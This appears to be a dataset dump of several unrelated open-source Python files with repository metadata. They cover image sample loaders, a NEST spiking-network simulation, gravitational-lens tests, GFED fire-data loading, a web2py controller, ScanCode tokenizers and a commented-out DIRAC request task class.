    This low-contrast image of the surface of the moon is useful for
    illustrating histogram equalization and contrast stretching.
    """
    return load("moon.png")
def page():
    """Scanned page.

    This image of printed text is useful for demonstrations requiring uneven
    background illumination.
    """
    return load("page.png")
def horse():
    """Black and white silhouette of a horse.

    This image was downloaded from
    `openclipart <http://openclipart.org/detail/158377/horse-by-marauder>`

    Released into public domain and drawn and uploaded by Andreas Preuss
    (marauder).
    """
    return load("horse.png")
def clock():
    """Motion blurred clock.

    This photograph of a wall clock was taken while moving the camera in an
    aproximately horizontal direction.  It may be used to illustrate
    inverse filters and deconvolution.

    Released into the public domain by the photographer (Stefan van der Walt).
    """
    return load("clock_motion.png")
def immunohistochemistry():
    """Immunohistochemical (IHC) staining with hematoxylin counterstaining.

    This picture shows colonic glands where the IHC expression of FHL2 protein
    is revealed with DAB.  Hematoxylin counterstaining is applied to enhance the
    negative parts of the tissue.

    This image was acquired at the Center for Microscopy And Molecular Imaging
    (CMMI).

    No known copyright restrictions.
    """
    return load("ihc.png")
def chelsea():
    """Chelsea the cat.

    An example with texture, prominent edges in horizontal and diagonal
    directions, as well as features of differing scales.

    Notes
    -----
    No copyright restrictions.  CC0 by the photographer (Stefan van der Walt).
    """
    return load("chelsea.png")
def coffee():
    """Coffee cup.

    This photograph is courtesy of Pikolo Espresso Bar.
    It contains several elliptical shapes as well as varying texture (smooth
    porcelain to course wood grain).

    Notes
    -----
    No copyright restrictions.  CC0 by the photographer (Rachel Michetti).
    """
    return load("coffee.png")
|
chintak/scikit-image
|
skimage/data/__init__.py
|
Python
|
bsd-3-clause
| 4,593
|
[
"ESPResSo"
] |
2aa863958c9df0b4ccef22ee54d341eaa264692902dd3e440e3f4d273df33640
|
#! /usr/bin/env python
# This version uses numpy to draw the random connections.
from scipy.optimize import fsolve
import cynest as nest
import cynest.raster_plot
import numpy
from numpy import exp
import time
def LambertWm1(x):
    """Evaluate the Lambert W function (branch -1) of `x` by delegating to
    the NEST SLI interpreter's built-in `LambertWm1` operator."""
    nest.sli_push(x)
    nest.sli_run('LambertWm1')
    return nest.sli_pop()
def ComputePSPnorm(tauMem, CMem, tauSyn):
    """Compute the maximum of the postsynaptic potential for a synaptic
    input current of unit amplitude (1 pA).

    tauMem/tauSyn are the membrane/synaptic time constants (ms) and CMem
    the membrane capacitance (pF)."""
    ratio = tauMem / tauSyn
    rate_diff = 1.0 / tauSyn - 1.0 / tauMem
    # time at which the PSP reaches its maximum (via Lambert W, branch -1)
    t_max = (-LambertWm1(-exp(-1.0 / ratio) / ratio) - 1.0 / ratio) / rate_diff
    # PSP value at t_max for a unit-amplitude alpha-shaped input current
    shape = (exp(-t_max / tauMem) - exp(-t_max / tauSyn)) / rate_diff - t_max * exp(-t_max / tauSyn)
    return exp(1.0) / (tauSyn * CMem * rate_diff) * shape
nest.ResetKernel()
startbuild= time.time()
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
# Parameters for asynchronous irregular firing
g = 5.0  # ratio of inhibitory to excitatory synaptic weight
eta = 2.0  # external rate relative to the threshold rate
epsilon = 0.1 # connection probability
order = 50
NE = 4*order  # number of excitatory neurons
NI = 1*order  # number of inhibitory neurons
N_neurons = NE+NI
N_rec = 50 # record from 50 neurons
CE = epsilon*NE # number of excitatory synapses per neuron
CI = epsilon*NI # number of inhibitory synapses per neuron
C_tot = int(CI+CE) # total number of synapses per neuron
# Initialize the parameters of the integrate and fire neuron
tauSyn = 0.5  # synaptic time constant (ms)
CMem = 250.0  # membrane capacitance (pF)
tauMem = 20.0  # membrane time constant (ms)
theta = 20.0  # spike threshold (mV)
J = 0.1 # postsynaptic amplitude in mV
# normalize synaptic current so that amplitude of a PSP is J
J_ex = J / ComputePSPnorm(tauMem, CMem, tauSyn)
J_in = -g*J_ex  # inhibitory weight, scaled and sign-flipped
# threshold rate, equivalent rate of events needed to
# have mean input current equal to threshold
nu_th = (theta * CMem) / (J_ex*CE*numpy.exp(1)*tauMem*tauSyn)
nu_ex = eta*nu_th
p_rate = 1000.0*nu_ex*CE  # Poisson generator rate (spikes/s)
nest.SetKernelStatus({"resolution": dt, "print_time": True})
print("Building network")
neuron_params= {"C_m" : CMem,
                "tau_m" : tauMem,
                "tau_syn_ex": tauSyn,
                "tau_syn_in": tauSyn,
                "t_ref" : 2.0,
                "E_L" : 0.0,
                "V_reset" : 0.0,
                "V_m" : 0.0,
                "V_th" : theta}
nest.SetDefaults("iaf_psc_alpha", neuron_params)
nodes_ex=nest.Create("iaf_psc_alpha",NE)
nodes_in=nest.Create("iaf_psc_alpha",NI)
nest.SetDefaults("poisson_generator",{"rate": p_rate})
noise=nest.Create("poisson_generator")
espikes=nest.Create("spike_detector")
ispikes=nest.Create("spike_detector")
nest.SetStatus([espikes],[{"label": "brunel-py-ex",
                           "withtime": True,
                           "withgid": True}])
nest.SetStatus([ispikes],[{"label": "brunel-py-in",
                           "withtime": True,
                           "withgid": True}])
print("Connecting devices.")
nest.CopyModel("static_synapse","excitatory",{"weight":J_ex, "delay":delay})
nest.CopyModel("static_synapse","inhibitory",{"weight":J_in, "delay":delay})
# every neuron receives the external Poisson drive
nest.DivergentConnect(noise,nodes_ex,model="excitatory")
nest.DivergentConnect(noise,nodes_in,model="excitatory")
# record spikes from the first N_rec excitatory / inhibitory neurons
nest.ConvergentConnect(list(range(1,N_rec+1)),espikes,model="excitatory")
nest.ConvergentConnect(list(range(NE+1,NE+1+N_rec)),ispikes,model="excitatory")
print("Connecting network.")
# Here, we create the connections from the excitatory neurons to all other
# neurons. We exploit that the neurons have consecutive IDs, running from
# 1,...,NE for the excitatory neurons and from
# (NE+1),...,(NE+NI) for the inhibitory neurons.
numpy.random.seed(1234)
sources_ex = numpy.random.random_integers(1,NE,(N_neurons,CE))
sources_in = numpy.random.random_integers(NE+1,N_neurons,(N_neurons,CI))
# We now iterate over all neuron IDs, and connect the neuron to
# the sources from our array. The first loop connects the excitatory neurons
# and the second loop the inhibitory neurons.
for n in range(N_neurons):
    nest.ConvergentConnect(list(sources_ex[n]),[n+1],model="excitatory")
for n in range(N_neurons):
    nest.ConvergentConnect(list(sources_in[n]),[n+1],model="inhibitory")
endbuild=time.time()
print("Simulating.")
nest.Simulate(simtime)
endsimulate= time.time()
# Mean firing rates (Hz) from the spike counts of the N_rec recorded neurons.
events_ex = nest.GetStatus(espikes,"n_events")[0]
rate_ex = events_ex/simtime*1000.0/N_rec
events_in = nest.GetStatus(ispikes,"n_events")[0]
rate_in = events_in/simtime*1000.0/N_rec
num_synapses = nest.GetDefaults("excitatory")["num_connections"]+\
               nest.GetDefaults("inhibitory")["num_connections"]
build_time = endbuild-startbuild
sim_time = endsimulate-endbuild
print("Brunel network simulation (Python)")
print("Number of neurons :", N_neurons)
print("Number of synapses:", num_synapses)
# BUG FIX: corrected the label typo "Exitatory" -> "Excitatory".
# The excitatory count includes the N_neurons Poisson-noise connections.
print("       Excitatory :", int(CE*N_neurons)+N_neurons)
print("       Inhibitory :", int(CI*N_neurons))
print("Excitatory rate   : %.2f Hz" % rate_ex)
print("Inhibitory rate   : %.2f Hz" % rate_in)
print("Building time     : %.2f s" % build_time)
print("Simulation time   : %.2f s" % sim_time)
nest.raster_plot.from_device(espikes, hist=True)
nest.raster_plot.show()
|
QJonny/CyNest
|
cynest/examples/brunel-alpha-numpy.py
|
Python
|
gpl-2.0
| 5,113
|
[
"NEURON"
] |
4a5ed733acb92fc1c8f47a4e033e6dcf109ed0846c4d2221a999bb2448fe5adf
|
__author__ = 'sibirrer'
from astrofunc.LensingProfiles.sie import SIE
from astrofunc.LensingProfiles.spemd import SPEMD
import numpy as np
import pytest
class TestSIS(object):
    """
    Tests that the SIE lensing profile agrees with SPEMD evaluated at
    power-law slope gamma=2 (the singular isothermal case).
    """
    def setup(self):
        # pytest invokes this before every test method
        self.sie = SIE()
        self.spemd = SPEMD()
    def test_function(self):
        # lensing potential: SIE must equal SPEMD with gamma=2
        x = np.array([1])
        y = np.array([2])
        theta_E = 1.
        q = 0.9
        phi_G = 1.
        values = self.sie.function(x, y, theta_E, q, phi_G)
        gamma = 2
        values_spemd = self.spemd.function(x, y, theta_E, gamma, q, phi_G)
        assert values == values_spemd
    def test_derivatives(self):
        # deflection angles: SIE must equal SPEMD with gamma=2
        x = np.array([1])
        y = np.array([2])
        theta_E = 1.
        q = 0.9
        phi_G = 1.
        values = self.sie.derivatives(x, y, theta_E, q, phi_G)
        gamma = 2
        values_spemd = self.spemd.derivatives(x, y, theta_E, gamma, q, phi_G)
        assert values == values_spemd
    def test_hessian(self):
        # second derivatives: only the first component is compared
        x = np.array([1])
        y = np.array([2])
        theta_E = 1.
        q = 0.9
        phi_G = 1.
        values = self.sie.hessian(x, y, theta_E, q, phi_G)
        gamma = 2
        values_spemd = self.spemd.hessian(x, y, theta_E, gamma, q, phi_G)
        assert values[0] == values_spemd[0]
# allow running this test module directly, outside a pytest invocation
if __name__ == '__main__':
    pytest.main()
|
sibirrer/astrofunc
|
test/test_sie.py
|
Python
|
mit
| 1,347
|
[
"Gaussian"
] |
97fbeb4906812d230322d7fa8f9218571a5badd58c5d22e76f28ad5ef1ac1790
|
#===============================================================================
# load_GFED.py
#-------------------------------------------------------------------------------
# @author D. T. Milodowski, November 2017
# This is a set of functions to load in GFED4 burned area data into numpy arrays
# These arrays have three dimensions: lat, long, time, with a monthly timestep
#
# Data references:
# - Giglio, L., J.T. Randerson, and G.R. van der Werf, (2013), J. Geophys. Res.
# Biogeosci., 118, 317328, doi:10.1002/jgrg.20042.
# - Randerson, J.T., Y. Chen, G.R. van derWerf, B.M. Rogers, and D.C. Morton
# (2012), J. Geophys. Res., 117, G04012, doi:10.1029/2012JG002128.
# - van der Werf, G.R., Randerson, J.T., Giglio, L., et al., (2017), Earth Syst..
# Sci. Data, 9, 697-720, https://doi.org/10.5194/essd-9-697-2017.
#===============================================================================
# import standard libraries
import numpy as np
# import netcdf libraries
from netCDF4 import Dataset
# Function to load GFED4 monthly data. There are two potential variables here:
# - burned area expressed as fraction of a pixel: BurnedFraction
# - burned area expressed as the area in square metres: BurnedArea
# Files collate annual data, with timestep indicated by the day of the year.
# Need to specify time period of interest and the N,S,E,W extents for the area
# of interest.
def load_GFED4_monthly(path2files,variable,start_month,start_year,end_month,end_year,N,S,E,W):
    # Load a monthly GFED4 time series for one variable, clipped to the
    # N/S/E/W bounding box, spanning start_year/start_month .. end_year/end_month.
    # Returns (dates, lat, lon, data) with data shaped (time, lat, lon).
    # NOTE(review): uses a Python 2 print statement below; this module is py2-only.
    # first of all obtain the start and end date of the time series
    start_date = np.datetime64('%04i-%02i' % (start_year,start_month))
    end_date = (np.datetime64('%04i-%02i' % (end_year,end_month))+np.timedelta64(1,'M'))
    dates = np.arange(start_date,end_date)
    n_dates = dates.size
    # Load one tile to dimensions of clipped array, and the array mask
    NetCDF_file = '%s/GFED4_%04i.nc' % (path2files,start_year)
    ds = Dataset(NetCDF_file)
    lat = np.asarray(ds.variables['latitude'])
    lon = np.asarray(ds.variables['longitude'])
    lat_mask = np.all((lat<=N,lat>=S),axis=0)
    lon_mask = np.all((lon<=E,lon>=W),axis=0)
    n_lat = lat_mask.sum()
    n_lon = lon_mask.sum()
    ds=None
    # Loop through the netcdf files, retrieving the data and putting into time series.
    year = np.arange(start_year,end_year + 1)
    month = np.arange(12)+1
    n_years = year.size
    i_mm = 0  # write cursor into the output time axis
    GFED_sample = np.zeros((n_dates,n_lat,n_lon))
    for yy in range(0,n_years):
        # get the number of months needed for this year
        n_months = 12
        start_mm = 1
        end_mm = 12
        if yy == 0:
            n_months = 12 - start_month + 1
            start_mm = start_month
        if year[yy] == end_year:
            n_months = n_months - (12-end_month)
            end_mm = end_month
        NetCDF_file = '%s/GFED4_%04i.nc' % (path2files,year[yy])
        print NetCDF_file
        ds = Dataset(NetCDF_file)
        # get area of interest
        month_mask = np.all((month>=start_mm,month<=end_mm),axis=0)
        array_mask = np.ix_(month_mask,lat_mask,lon_mask)
        GFED_sample[i_mm:i_mm+n_months] = np.asarray(ds.variables[variable])[array_mask]
        i_mm += n_months
    return dates, lat[lat_mask], lon[lon_mask], GFED_sample
|
DTMilodowski/EO_data_processing
|
src/fire/load_GFED.py
|
Python
|
gpl-3.0
| 3,306
|
[
"NetCDF"
] |
c46ee3e427ea2869099a9d0449dad4f5a9d7a830da49ba1f28de1e4a12148277
|
# - Coding UTF8 -
#
# Networked Decision Making
# Development Sites (source code):
# http://code.google.com/p/global-decision-making-system/
# http://github.com/NewGlobalStrategy/NetDecisionMaking
#
# Demo Sites (Google App Engine)
# http://netdecisionmaking.appspot.com
# http://globaldecisionmaking.appspot.com
#
# License Code: MIT
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# For details on the web framework used for this development
#
# Developed by Russ King (newglobalstrategy@gmail.com
# Russ also blogs occasionally to pass the time at:
# http://proudofyourplanent.blogspot.com
# His general thinking on why this project is very important is available at
# http://www.scribd.com/doc/98216626/New-Global-Strategy
# With thanks to Guido, Massimo and many other that make this sort of thing
# much easier than it used to be
#form = SQLFORM(..., formstyle = SQLFORM.formstyles.bootstrap3)
#grid = SQLFORM.grid(..., formstyle = SQLFORM.formstyles.bootstrap3) rubbish
#grid = SQLFORM.smartgrid(..., formstyle = SQLFORM.formstyles.bootstrap3)
#class="btn btn-primary btn-lg btn-block" - next find the button setup
#class="btn btn-primary"
#A(download.title, _href=URL("getfile", args=download.file))
#response.formstyle = 'bootstrap3_inline' # or 'bootstrap3_stacked'
def index():
    """
    This is the startup function.
    It retrieves the 5 highest priority actions, 5 most recently resolved quests
    and highest priority quests in progress.
    For actions - any status except rejected are wanted but to avoid an or or a
    not for GAE we will use ans3 for this purpose with numans always two for an
    action this is ok.
    """
    response.flash = "Welcome to Net Decision Making"
    #Move subject table to website parameters - think how this fits in though
    #think this should be done elsewhere
    #subj = db(db.subject.id>0).select(db.subject.longdesc).first()
    if INIT:
        pass
    else:
        # database not initialised yet - send the user to the setup action
        redirect(URL('admin', 'init'))
    response.title = "Net Decision Making"
    # NOTE(review): cache is 1200 seconds (20 minutes), not the "2 mins"
    # the original docstring claimed - confirm which is intended.
    WEBSITE_PARAMETERS = db(db.website_parameters).select(cache=(cache.ram, 1200), cacheable=True).first()
    return dict(title=response.title, WEBSITE_PARAMETERS=WEBSITE_PARAMETERS)
def questload():
    # Ajax component: load a page of quests, selected and sorted according to
    # request.vars (page, items_per_page, sortby, query).  Fetches one extra
    # row beyond the page size so the view can tell whether a next page exists.
    #this came from resolved and thinking is it may replace it in due course but have
    #take then hradio button form out for now at least
    #need to get the event id into the query in due course but get it basically working
    #first
    if request.vars.page:
        page = int(request.vars.page)
    else:
        page = 0
    if request.vars.items_per_page:
        items_per_page = int(request.vars.items_per_page)
    else:
        items_per_page = 3
    limitby = (page * items_per_page, (page + 1) * items_per_page + 1)
    q = 'std'
    if request.vars.sortby:
        if request.vars.sortby == 'ResDate':
            sortby = ~db.question.resolvedate
        else:
            sortby = ~db.question.priority
    else:
        sortby = ~db.question.createdate
    # NOTE(review): if request.vars.query is truthy but neither 'inprog' nor
    # 'event', `quests` is never assigned and the return raises NameError.
    if request.vars.query:
        if request.vars.query == 'inprog':
            q = 'inprog'
            query = (db.question.qtype == 'quest') & (db.question.status == 'In Progress')
            #quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
            #                          orderby=[sortby], limitby=limitby)
            quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
                                      orderby=[sortby], limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
        elif request.vars.query == 'event':
            q = 'event'
            query = (db.question.eventid == session.eventid)
            quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
                                      orderby=[sortby], limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
    else:
        query = (db.question.qtype == 'quest') & (db.question.status == 'Resolved')
        quests = db(query).select(db.question.id, db.question.questiontext, db.question.status, db.question.level,
                                  db.question.priority, db.question.correctanstext, db.question.numagree,
                                  db.question.numdisagree, orderby=[sortby], limitby=limitby,
                                  cache=(cache.ram, 1200), cacheable=True)
    return dict(quests=quests, page=page, items_per_page=items_per_page, q=q)
def actionload():
    # Ajax component: load a page of agreed actions (home view).
    #this came from questload and it may make sense to combine - however fields
    #and query would be different lets confirm works this way and then think about it
    if request.vars.page:
        page = int(request.vars.page)
    else:
        page = 0
    items_per_page = 3
    # fetch one extra row so the view can detect a further page
    limitby = (page * items_per_page, (page + 1) * items_per_page + 1)
    q = 'std'
    # NOTE(review): when request.vars.query != 'home', `actions` (and `query`)
    # are never assigned, so the return below raises NameError - confirm
    # whether other query values can reach this action.
    if request.vars.query == 'home':
        q = 'home'
        query = (db.question.qtype == 'action') & (db.question.status == 'Agreed')
        sortby = ~db.question.createdate
        actions = db(query).select(db.question.id, db.question.status, db.question.questiontext, db.question.duedate,
                                   db.question.responsible, db.question.priority, db.question.achieved,
                                   db.question.activescope, db.question.category, db.question.continent,
                                   db.question.country, db.question.subdivision, db.question.scopetext,
                                   orderby=sortby, limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
    return dict(actions=actions, page=page, items_per_page=items_per_page, q=q)
def user():
    """
    exposes:
    http://..../[app]/default/user/login
    http://..../[app]/default/user/logout
    http://..../[app]/default/user/register
    http://..../[app]/default/user/profile
    http://..../[app]/default/user/retrieve_password
    http://..../[app]/default/user/change_password
    use @auth.requires_login()
        @auth.requires_membership('group name')
        @auth.requires_permission('read','table name',record_id)
    to decorate functions that need access control
    """
    #if request.args[0][:8] == "register":
    response.title = "Net Decision Making"
    # reset all per-session browse state on any auth transition
    session.exclude_cats = None
    session.comblist = None
    session.questlist = None
    session.actlist = None
    session.continent = None
    session.country = None
    session.subdivision = None
    session.eventid = None
    return dict(form=auth())
def call():
    """
    exposes services. for example:
    http://..../[app]/default/call/jsonrpc
    decorate with @services.jsonrpc the functions to expose
    supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv
    """
    return service()
@auth.requires_signature()
def data():
    """
    http://..../[app]/default/data/tables
    http://..../[app]/default/data/create/[table]
    http://..../[app]/default/data/read/[table]/[id]
    http://..../[app]/default/data/update/[table]/[id]
    http://..../[app]/default/data/delete/[table]/[id]
    http://..../[app]/default/data/select/[table]
    http://..../[app]/default/data/search/[table]
    but URLs must be signed, i.e. linked with
    A('table',_href=URL('data/tables',user_signature=True))
    or with the signed load operator
    LOAD('default','data.load',args='tables',ajax=True,user_signature=True)
    """
    # generic signed CRUD endpoint backed by web2py's crud service
    return dict(form=crud())
|
NewGlobalStrategy/NetDecisionMaking
|
controllers/default.py
|
Python
|
mit
| 7,638
|
[
"VisIt"
] |
ed01f7ffced665b660d813b17412f130285bd2b7061511a4e06813fd82298d4f
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from itertools import islice
from itertools import izip
import re
from zlib import crc32
from textcode.analysis import text_lines
"""
Utilities to break texts in lines and tokens (aka. words) with specialized version
for queries and rules texts.
"""
def query_lines(location=None, query_string=None, strip=True):
    """
    Return an iterable of text lines given a file at `location` or a
    `query string`. Include empty lines.
    """
    # TODO: OPTIMIZE: tokenizing line by line may be rather slow
    # we could instead get lines and tokens at once in a batch?
    if location:
        lines = text_lines(location, demarkup=False)
    elif query_string:
        # keep the line endings only when the caller asked not to strip
        lines = query_string.splitlines(not strip)
    else:
        lines = []
    for line in lines:
        yield line.strip() if strip else line
# Split on whitespace and punctuations: keep only characters and +.
# Keeping the + is important for licenses name such as GPL2+.
# `_letter_or_digit` also keeps a trailing "+" (optionally space-separated)
# attached to its word.
_letter_or_digit = '[a-zA-Z0-9]+ ?\+'
_not_punctuation = '[^!\"#\$%&\'\(\)\*,\-\./:;<=>\?@\[\]\^_`\{\|\}\\\~\s\+\x92\x93\x94”“’–]'
query_pattern = _letter_or_digit + '|' + _not_punctuation
# findall-based splitter: returns the list of token strings in a text
word_splitter = re.compile('(?:%s)+' % query_pattern, re.UNICODE).findall
def query_tokenizer(text, lower=True):
    """
    Return an iterable of tokens from a unicode query text.
    """
    if not text:
        return []
    if lower:
        text = text.lower()
    return (tok for tok in word_splitter(text) if tok)
# Alternate pattern used for matched text collection
# collect tokens and non-token texts in two different groups
_punctuation = '[!\"#\$%&\'\(\)\*,\-\./:;<=>\?@\[\]\^_`\{\|\}\\\~\s\+\x92\x93\x94”“’–]'
_text_capture_pattern = '(?P<token>(?:' + query_pattern + ')+)' + '|' + '(?P<punct>' + _punctuation + '+)'
# finditer-based scanner yielding alternating token / punctuation matches
tokens_and_non_tokens = re.compile(_text_capture_pattern, re.UNICODE).finditer
def matched_query_text_tokenizer(text):
    """
    Return an iterable of tokens and non-tokens from a unicode query text keeping
    everything (including punctuations, line endings, etc.)
    The returned iterable contains 2-tuples of:
    - True if the string is a text token or False if this is not (such as punctuation, spaces, etc).
    - the corresponding string
    This is used to reconstruct the matched query text accurately.
    """
    if not text:
        return
    for hit in tokens_and_non_tokens(text):
        if not hit:
            continue
        groups = hit.groupdict()
        token_text = groups.get('token')
        punct_text = groups.get('punct')
        # exactly one of the two named groups matches per hit
        if token_text:
            yield True, token_text
        elif punct_text:
            yield False, punct_text
# Template-aware splitter, keeping a templated part {{anything}} as a token.
# This splitter yields plain token strings or double braces-enclosed strings
# {{something}} for templates. curly braces are otherwise treated as punctuation.
# A template part is anything enclosed in double braces
template_pattern = '\{\{[^{}]*\}\}'
rule_pattern = '(?:%s)+|%s+' % (query_pattern, template_pattern,)
# rule_pattern = template_pattern
template_splitter = re.compile(rule_pattern , re.UNICODE).findall
def rule_tokenizer(text, lower=True):
    """
    Return an iterable of tokens from a unicode rule text, skipping templated
    parts, including leading and trailing templated parts.
    For example:
    >>> list(rule_tokenizer(''))
    []
    >>> list(rule_tokenizer('some Text with spAces! + _ -'))
    [u'some', u'text', u'with', u'spaces']
    Unbalanced templates are handled correctly:
    >>> list(rule_tokenizer('{{}some }}Text with spAces! + _ -'))
    [u'some', u'text', u'with', u'spaces']
    Templates are handled and skipped for templated sequences:
    >>> list(rule_tokenizer('{{Hi}}some {{}}Text with{{noth+-_!@ing}} {{junk}}spAces! + _ -{{}}'))
    [u'some', u'text', u'with', u'spaces']
    """
    if not text:
        return []
    text = lower and text.lower() or text
    tokens = template_splitter(text)
    # skip templates: any token starting with '{{' is a {{...}} placeholder
    return (token for token in tokens if token and not token.startswith('{{'))
def ngrams(iterable, ngram_length):
    """
    Return an iterable of ngrams of length `ngram_length` given an `iterable`
    sequence. Each ngram is a tuple of `ngram_length` items.

    The returned iterable is empty if the input contains fewer than
    `ngram_length` items.

    Note: this is a fairly arcane but optimized way to compute ngrams.
    The input must be a restartable sequence (list, tuple, array, string),
    not a one-shot iterator, since `islice` is applied to it once per ngram
    position.

    For example:
    >>> list(ngrams([1, 2, 3, 4, 5], 2))
    [(1, 2), (2, 3), (3, 4), (4, 5)]
    >>> list(ngrams([1, 2, 3, 4, 5], 4))
    [(1, 2, 3, 4), (2, 3, 4, 5)]
    >>> list(ngrams([1], 2))
    []
    """
    # zip (rather than the Python-2-only itertools.izip) works on both Python 2
    # and 3 and stops at the shortest slice, so short inputs yield nothing.
    return zip(*(islice(iterable, i, None) for i in range(ngram_length)))
def select_ngrams(ngrams, with_pos=False):
    """
    Return an iterable as a subset of a sequence of `ngrams` using the
    hailstorm algorithm. If `with_pos` is True, also include the starting
    position of the ngram in the original sequence, yielding (pos, ngram)
    tuples instead of plain ngrams.

    Definition from the paper: http://www2009.eprints.org/7/1/p61.pdf

        The algorithm first fingerprints every token and then selects a
        shingle s if the minimum fingerprint value of all k tokens in s
        occurs at the first or the last position of s (and potentially also
        in between). Due to the probabilistic properties of Rabin
        fingerprints the probability that a shingle is chosen is 2/k if all
        tokens in the shingle are different.

    The first and last ngrams of the sequence are always yielded, selected
    or not.
    """
    last = None
    ngram = None
    for pos, ngram in enumerate(ngrams):
        # FIXME: use a proper hash
        # encode() is required on Python 3 where crc32 only accepts bytes; it
        # is a no-op on the ASCII repr under Python 2, preserving behavior.
        nghs = [crc32(str(ng).encode('utf-8')) for ng in ngram]
        min_hash = min(nghs)
        if with_pos:
            ngram = (pos, ngram,)
        if nghs[0] == min_hash or nghs[-1] == min_hash:
            yield ngram
            last = ngram
        else:
            # always yield the first ngram, selected or not
            if pos == 0:
                yield ngram
                last = ngram
    # always yield the last ngram too, unless it was just yielded
    # (no-op on empty input since both are then None)
    if last != ngram:
        yield ngram
|
yasharmaster/scancode-toolkit
|
src/licensedcode/tokenize.py
|
Python
|
apache-2.0
| 8,538
|
[
"VisIt"
] |
096ff806b2a86cdabd9b4062845e466e5d88c17b7ff2339f3d83e960a69ad9aa
|
# ########################################################################
# # $HeadURL $
# # File: RequestTask.py
# # Author: Krzysztof.Ciba@NOSPAMgmail.com
# # Date: 2011/10/12 12:08:51
# ########################################################################
# """ :mod: RequestTask
# =================
#
# .. module: RequestTask
# :synopsis: base class for requests execution in separate subprocesses
# .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
#
# Base class for requests execution in a separate subprocesses.
#
# :deprecated:
# """
#
# __RCSID__ = "$Id$"
#
# # #
# # @file RequestTask.py
# # @author Krzysztof.Ciba@NOSPAMgmail.com
# # @date 2011/10/12 12:09:18
# # @brief Definition of RequestTask class.
#
# from DIRAC.DataManagementSystem.Client.DataManager import DataManager
# from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
#
#
# class RequestTask( object ):
# """
# .. class:: RequestTask
#
# Base class for DMS 'transfer', 'removal' and 'register' Requests processing.
# This class is meant to be executed as a ProcessTask inside ProcessPool.
#
# The most important and common global DIRAC objects are created in RequestTask constructor.
# This includes gLogger, gConfig, gProxyManager, S_OK and S_ERROR. The constructor also
# imports a set of common modules: os, sys, re, time and everything from types module.
#
# All other DIRAC tools and clients (i.e. DataManager) are instance attributes of RequestTask class
#
# All currently proxied tools are::
#
# DataLoggingClient -- self.dataLoggingClient()
# RequestClient -- self.requestClient()
# StorageFactory -- self.storageFactory()
#
# SubLogger message handles for all levels are also proxied, so you can directly use them in your code, i.e.::
#
# self.info("An info message")
# self.debug("This will be shown only in debug")
#
# For handling sub-request one has to register their actions handlers using :self.addOperationAction:
# method. This method checks if handler is defined as a method of inherited class and then puts its
# definition into internal operation dispatcher dictionary with a key of sub-request's operation name.
#
# Each operation handler should have the signature::
#
# def operationName( self, index, requestObj, subRequestAttrs, subRequestFiles )
#
# where index is a sub-request counter, requestObj is a RequestContainer instance,
# subRequestAttrs is a dict with sub-request attributes and subRequestFiles is a dict with
# files attached to the sub-request.
#
# Handlers should always return S_OK with value of (modified or not) requestObj, S_ERROR with some
# error message otherwise.
#
# Processing of request is done automatically in self.__call__, one doesn't have to worry about changing
# credentials, looping over subrequests or request finalizing -- only sub-request processing matters in
# the all inherited classes.
#
# Concerning :MonitringClient: (or better known its global instance :gMonitor:), if someone wants to send
# some metric over there, she has to put in agent's code registration of activity and then in a particular
# task use :RequestTask.addMark: to save monitoring data. All monitored activities are held in
# :RequestTask.__monitor: dict which at the end of processing is returned from :RequestTask.__call__:.
# The values are then processed and pushed to the gMonitor instance in the default callback function.
# """
#
# ## reference to DataLoggingClient
# __dataLoggingClient = None
# # # reference to RequestClient
# __requestClient = None
# # # reference to StorageFactory
# __storageFactory = None
# # # subLogger
# __log = None
# # # request type
# __requestType = None
# # # placeholder for request owner DB
# requestOwnerDN = None
# # # placeholder for Request owner group
# requestOwnerGroup = None
#
# # # operation dispatcher for SubRequests,
# # # a dictionary
# # # "operation" => methodToRun
# # #
# __operationDispatcher = {}
# # # holder for DataManager proxy file
# __dataManagerProxy = None
# # # monitoring dict
# __monitor = {}
#
# def __init__( self, requestString, requestName, executionOrder, jobID, configPath ):
# """ c'tor
#
# :param self: self reference
# :param str requestString: XML serialised RequestContainer
# :param str requestName: request name
# :param list executionOrder: request execution order
# :param int jobID: jobID
# :param str sourceServer: request's source server
# :param str configPath: path in CS for parent agent
# """
# # # fixtures
#
# # # python fixtures
# import os, os.path, sys, time, re, types
# self.makeGlobal( "os", os )
# self.makeGlobal( "os.path", os.path )
# self.makeGlobal( "sys", sys )
# self.makeGlobal( "time", time )
# self.makeGlobal( "re", re )
# # # export all Types from types
# [ self.makeGlobal( item, getattr( types, item ) ) for item in dir( types ) if "Type" in item ]
#
# # # DIRAC fixtures
# from DIRAC.FrameworkSystem.Client.Logger import gLogger
# self.__log = gLogger.getSubLogger( "%s/%s" % ( self.__class__.__name__, str( requestName ) ) )
#
# self.always = self.__log.always
# self.notice = self.__log.notice
# self.info = self.__log.info
# self.debug = self.__log.debug
